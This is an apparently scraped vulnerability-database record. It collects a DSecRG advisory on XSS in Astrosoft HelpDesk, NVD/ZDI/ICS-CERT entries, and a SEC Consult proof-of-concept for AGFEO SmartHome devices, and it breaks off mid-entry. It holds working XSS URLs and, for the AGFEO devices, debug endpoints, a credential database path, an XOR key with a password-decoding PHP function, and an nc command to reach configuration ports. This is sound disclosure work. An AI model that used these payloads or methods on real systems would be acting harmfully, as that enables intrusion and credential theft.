Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services, and certification for the ISO/IEC 27001:2005 and PCI DSS standards. The Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.
Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
Digital Security Research Group mailto:research@dsec.ru
{"id": "SECURITYVULNS:DOC:19004", "bulletinFamily": "software", "title": "[DSECRG-08-011] Astrosoft HelpDesk Multiple XSS", "description": "\r\n\r\nDigital Security Research Group [DSecRG] Advisory #DSECRG-08-011\r\n\r\n\r\nApplication: Astrosoft HelpDesk\r\nVersions Affected: \r\nVendor URL: http://astrosoft.ru/\r\nBugs: Multiple XSS Injections\r\nExploits: YES\r\nReported: 29.01.2008\r\nVendor response: NONE\r\nDate of Public Advisory: 04.02.2008\r\nAuthors: Alexandr Polyakov, Stas Svistunovich\r\n Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)\r\n\r\n\r\n\r\nDescription\r\n***********\r\n\r\nAstrosoft HelpDesk system has multiple security vulnerabilities:\r\n\r\n1. Linked XSS\r\n2. Linked SiXSS\r\n\r\n\r\n\r\nDetails\r\n*******\r\n\r\n1. Linked XSS vulnerability found in operator/article/article_search_results.asp, attacker can inject XSS in GET parameter "txtSearch"\r\n\r\nExample:\r\n\r\nhttp://[server]/[installdir]/operator/article/article_search_results.asp?txtSearch="></form><IMG SRC=javascript:alert('DSecRG XSS')>"\r\n\r\n--------------------------------------------------------------------------------------------\r\n\r\n\r\n2. SiXSS in URL\r\n\r\nVulnerability found in script operator/article/article_attachment.asp, attacker can inject XSS code in SQL Error.\r\n\r\nGET parameter "Attach_Id"\r\n\r\nExample:\r\n\r\nhttp://[server]/[installdir]/operator/article/article_attachment.asp?Attach_Id="<script>alert('DSecRG XSS')</script>\r\n\r\n\r\n\r\nAbout\r\n*****\r\n\r\nDigital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. 
Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.\r\n\r\n\r\nContact: research [at] dsec [dot] ru\r\n http://www.dsec.ru (in Russian)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n-- \r\n\r\n Digital Security Research Group mailto:research@dsec.ru", "published": "2008-02-05T00:00:00", "modified": "2008-02-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19004", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:24", "edition": 1, "viewCount": 43, "enchantments": {"score": {"value": 2.3, "vector": "NONE", "modified": "2018-08-31T11:10:24", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB3023167", "KB2880833", "KB953334", "KB2874216", "KB3209587", "KB981401", "KB2788321", "KB2510690", "KB2785908", "KB955430"]}, {"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_D887B3D9736611EAB81A001CC0382B2F.NASL", "FREEBSD_PKG_090763F6703011EA93DD080027846A02.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "freebsd", "idList": ["D887B3D9-7366-11EA-B81A-001CC0382B2F"]}, {"type": "zdt", "idList": ["1337DAY-ID-34154", "1337DAY-ID-34158", "1337DAY-ID-34157"]}], "modified": "2018-08-31T11:10:24", "rev": 2}, "vulnersScore": 2.3}, "affectedSoftware": []}
{"cve": [{"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": 
"CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:39", "description": "LCDS Laquis SCADA prior to version 4.1.0.4150 allows out of bounds read when opening a specially crafted project file, which may allow data exfiltration.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2019-02-01T18:29:00", "title": "CVE-2018-19004", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-19004"], "modified": "2019-10-09T23:37:00", "cpe": [], "id": "CVE-2018-19004", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19004", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "zdi": [{"lastseen": "2020-06-22T11:40:43", "bulletinFamily": "info", "cvelist": ["CVE-2018-19004"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of LAquis SCADA Software. 
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of LQS files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the aq process.", "edition": 1, "modified": "2019-06-22T00:00:00", "published": "2019-01-19T00:00:00", "id": "ZDI-19-099", "href": "https://www.zerodayinitiative.com/advisories/ZDI-19-099/", "title": "LAquis SCADA LQS File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-22T11:40:53", "bulletinFamily": "info", "cvelist": ["CVE-2018-19004"], "description": "This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of LQS files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. 
An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the aq process.", "edition": 1, "modified": "2019-06-22T00:00:00", "published": "2019-01-19T00:00:00", "id": "ZDI-19-098", "href": "https://www.zerodayinitiative.com/advisories/ZDI-19-098/", "title": "LAquis SCADA LQS File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "type": "zdi", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "ics": [{"lastseen": "2020-12-18T03:22:04", "bulletinFamily": "info", "cvelist": ["CVE-2018-19004", "CVE-2018-18986", "CVE-2018-18996", "CVE-2018-19002", "CVE-2018-18998", "CVE-2018-19000", "CVE-2018-19029", "CVE-2018-18992", "CVE-2018-18990", "CVE-2018-18988", "CVE-2018-18994"], "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 7.8**\n\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor:** LCDS - Le\u00e3o Consultoria e Desenvolvimento de Sistemas Ltda ME\n * **Equipment:** LAquis SCADA\n * **Vulnerabilities:** Improper Input Validation, Out-of-Bounds Read, Code Injection, Untrusted Pointer Dereference, Out-of-Bounds Write, Relative Path Traversal, Injection, Use of Hard-Coded Credentials, Authentication Bypass Using an Alternate Path or Channel\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow remote code execution, data exfiltration, or cause a system crash.\n\n## 3\\. 
TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of LAquis SCADA, an industrial automation software, are affected:\n\n * SCADA 4.1.0.3870\n\n### 3.2 VULNERABILITY OVERVIEW\n\n### 3.2.1 [ IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nOpening a specially crafted report format file allows execution of script code, which may allow remote code execution, data exfiltration, or cause a system crash.\n\n[CVE-2018-18988](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18988>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>).\n\n### 3.2.2 [OUT-OF-BOUNDS READ CWE-125](<https://cwe.mitre.org/data/definitions/125.html>)\n\nOpening a specially crafted project file may cause an out of bounds read, which may allow data exfiltration.\n\n[CVE-2018-19004](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19004>) has been assigned to this vulnerability. A CVSS v3 base score of 3.3 has been calculated; the CVSS vector string is [(AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N>).\n\n### 3.2.3 [ IMPROPER CONTROL OF GENERATION OF CODE ('CODE INJECTION') CWE-94](<https://cwe.mitre.org/data/definitions/94.html>)\n\nOpening a specially crafted project file may cause improper control of generation of code, which may allow remote code execution, data exfiltration, or cause a system crash.\n\n[CVE-2018-19002](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19002>) has been assigned to this vulnerability. 
A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is [(AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H>).\n\n### 3.2.4 [UNTRUSTED POINTER DEREFERENCE CWE-822](<https://cwe.mitre.org/data/definitions/822.html>)\n\nAn attacker using a specially crafted project file can supply a pointer for a controlled memory address, which may allow remote code execution, data exfiltration, or cause a system crash.\n\n[CVE-2018-19029](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19029>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>).\n\n### 3.2.5 [OUT-OF-BOUNDS WRITE CWE-787](<https://cwe.mitre.org/data/definitions/787.html>)\n\nOpening specially crafted report format file may cause an out of bounds read, which may cause a system crash, allow data exfiltration, or remote code execution.\n\n[CVE-2018-18986](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18986>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>).\n\n### 3.2.6 [RELATIVE PATH TRAVERSAL CWE-23](<https://cwe.mitre.org/data/definitions/23.html>)\n\nThe issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to disclose sensitive information under the context of the web server process.\n\n[CVE-2018-18990](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18990>) has been assigned to this vulnerability. 
A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N>).\n\n### 3.2.7 [OUT-OF-BOUNDS READ CWE-125](<https://cwe.mitre.org/data/definitions/125.html>)\n\nOpening specially crafted project file may cause an out of bounds read, which may cause a system crash or allow data exfiltration.\n\n[CVE-2018-18994](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18994>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>).\n\n### 3.2.8 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS IN OUTPUT USED BY A DOWNSTREAM COMPONENT ('INJECTION') CWE-74](<https://cwe.mitre.org/data/definitions/74.html>)\n\nTaking in user input without proper sanitation may allow an attacker to execute remote code on the server.\n\n[CVE-2018-18992](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18992>) has been assigned to this vulnerability. A CVSS v3 base score of 6.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L>).\n\n### 3.2.9 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS IN OUTPUT USED BY A DOWNSTREAM COMPONENT ('INJECTION') CWE-74](<https://cwe.mitre.org/data/definitions/74.html>)\n\nTaking in user input without proper authorization or sanitation may allow an attacker to execute remote code on the server.\n\n[CVE-2018-18996](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18996>) has been assigned to this vulnerability. 
A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>).\n\n### 3.2.10 [USE OF HARD-CODED CREDENTIALS CWE-798](<https://cwe.mitre.org/data/definitions/798.html>)\n\nUse of hard coded credentials may allow an attacker unauthorized access to the system with high-privileges.\n\n[CVE-2018-18998](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18998>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>).\n\n### 3.2.11 [AUTHENTICATION BYPASS USING AN ALTERNATE PATH OR CHANNEL CWE-288](<https://cwe.mitre.org/data/definitions/288.html>)\n\nAn authentication bypass is possible, which may allow an attacker access to sensitive data.\n\n[CVE-2018-19000](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-19000>) has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is [(AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N>).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Chemical, Commercial Facilities, Energy, Food and Agriculture, Transportation Systems, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED:** South America\n * **COMPANY HEADQUARTERS LOCATION:** Brazil\n\n### 3.4 RESEARCHER\n\nEsteban Ruiz (mr me) working with Zero Day Initiative reported these vulnerabilities to NCCIC.\n\n## 4\\. MITIGATIONS\n\nLCDS recommends users update to Version 4.1.0.4150 which can be found at the following location:\n\n[https://laquisscada.com](<https://laquisscada.com/>)\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. 
Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNCCIC also recommends that users take the following measures to protect themselves from social engineering attacks: \n\n * Do not click web links or open unsolicited attachments in email messages. \n * Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. 
\n * Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-19-015-01>); we'd welcome your feedback.\n", "edition": 13, "modified": "2019-01-15T00:00:00", "published": "2019-01-15T00:00:00", "id": "ICSA-19-015-01", "href": "https://www.us-cert.gov//ics/advisories/ICSA-19-015-01", "title": "LCDS - Le\u00e3o Consultoria e Desenvolvimento de Sistemas Ltda ME LAquis SCADA", "type": "ics", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}], "seebug": [{"lastseen": "2018-06-08T07:13:03", "description": "### Vendor description:\r\nAGFEO GmbH & Co. 
KG is a vendor of telephone systems and other (tele-)communication products like DECT phones, headsets or smart home products as well.\r\n\r\n\r\n### Business recommendation:\r\n\r\nThe available patches should be installed immediately.\r\n\r\nSEC Consult recommends not to use this product in a production environment until a thorough security review has been performed by security professionals as there are indications for further security issues.\r\n\r\n\r\n### Vulnerability overview/description:\r\n\r\n1) Unauthenticated access to web services and authentication bypass\r\n\r\nA web service with multiple scripts for debug purposes is accessible on an unusual port on the device. There is also a script to read files from the filesystem. As the web service runs with root privileges all files on the operating system can be read by an attacker. This only affects the ES 5xx product line, all other vulnerabilities affect both ES 5xx and 6xx.\r\n\r\nThe configuration of the device can be changed and arbitrary updates can be uploaded as well as music files for the answering machine. By reading the database content, the usernames and their passwords can be revealed and easily\r\ndecrypted. This way the administrator password can be dumped from the database and the device can be fully administrated by an attacker. The normal user interface has an additional development subfolder which was probably used during the development process. Updates can be triggered from this sub platform and log files, statistics and states can also be displayed.\r\n\r\n\r\n2) Unauthenticated access to configuration ports\r\n\r\nMultiple different instances of TCP services are present on the device. Each of the listening sockets is forked from a debug and configuration service. Internal device information can be read from the device. 
Among other commands, the configuration of the device can also be altered by using these services.\r\n\r\n\r\n3) Hardcoded cryptographic keys\r\n\r\nThree certificates including their private keys are embedded in the firmware of AGFEO ES 5xx/6xx SmartHome products. The certificates and keys in both product lines are exactly the same. One certificate is used for HTTPS\r\n(default server certificate for web based configuration and management).\r\n\r\nImpersonation, man-in-the-middle or passive decryption attacks are possible. These attacks allow an attacker to gain access to sensitive information like admin credentials and use them in further attacks.\r\n\r\n\r\n4) Multiple reflected cross site scripting (XSS) vulnerabilities\r\n\r\nThe ES 5xx SmartHome products are vulnerable to reflected cross site scripting. Malicious JavaScript code can be executed in the browser of a victim by luring to a handcrafted link. This is possible even if the victim is not logged in. It is assumed that the 6xx products are affected as well but those could not be tested.\r\n\r\n\r\n### Proof of concept:\r\n\r\n1) Unauthenticated access to web services and authentication bypass \r\n\r\nThe debug web service is available by using the following url:\r\n```\r\nhttp://<Device-IP>:20011/index.html\r\n```\r\nThere are different scripts accessible, the following actions can be executed:\r\n * -) Change IP configuration\r\n * -) Change time zone\r\n * -) Upload updates (Any files can be uploaded to the device!)\r\n * -) Read all files on the filesystem\r\n * -) Play, delete and move voice messages on all mail boxes\r\n * -) Converting mp3 files to wav files\r\n * -) List all connected phones and the related numbers\r\n\r\nThe SQLite database is located under \"/home/profile/poolstore.db\". By reading this file the usernames and passwords can be dumped. The passwords are encoded with base64 and encrypted with XOR. 
To decrypt the XOR'ed password the following key has to be used:\r\n```\r\n \"0x42 0xab 0xce 0xfa 0x54 0xed 0xcf 0xba\"\r\n```\r\n\r\nThe function to decrypt the password was found in the php script \"login.php\":\r\n```\r\nfunction decodePassword($PasswordEnc)\r\n{\r\n $PasswordBinaryEncBase64 = \"\";\r\n $PasswordBinaryEnc=\"\";\r\n $PasswordBinary = array();\r\n $Password = \"\";\r\n $lastChar=0;\r\n\r\n $Key=array(0x42, 0xab, 0xce, 0xfa, 0x54, 0xed, 0xcf, 0xba);\r\n\r\n $PasswordBinaryEncBase64 = $PasswordEnc;\r\n\r\n // base64 decode\r\n $PasswordBinaryEnc = base64_decode($PasswordBinaryEncBase64);\r\n\r\n // xor decode\r\n for($i=0; $i<strlen($PasswordBinaryEnc); $i++) {\r\n $PasswordBinary[$i] = ord($PasswordBinaryEnc[$i]) ^ $Key[$i % count($Key)]\r\n^ $lastChar;\r\n $lastChar = ord($PasswordBinaryEnc[$i]);\r\n }\r\n\r\n // erstes Zeichen entfernen (random char!)\r\n foreach ($PasswordBinary as $chr) {\r\n $Password .= chr($chr);\r\n }\r\n $Password = substr($Password, 1);\r\n // printf(\"%s:%d Password %s\\n\", __FUNCTION__, __LINE__, $Password);\r\n return $Password;\r\n}\r\n```\r\n\r\nAn additional subfolder, which contains debug scripts, is available under the following location:\r\n```\r\nhttp://<Device-IP>/shdev/ui9.php\r\n```\r\n\r\nUpdates can be triggered, logs can be shown and status messages can be gathered within this functionality. Furthermore, it is possible to debug the login process. Since there is a hardcoded user \"admin\" a brute force attack is also possible.\r\n\r\n\r\n2) Unauthenticated access to configuration ports \r\n\r\nThe following TCP ports can be accessed with \"nc <Device-IP> -p <Port>\": 19002, 19004, 19006, 19009, 19010, 19080, 19081 By connecting to one of these ports a debug interface spawns. 
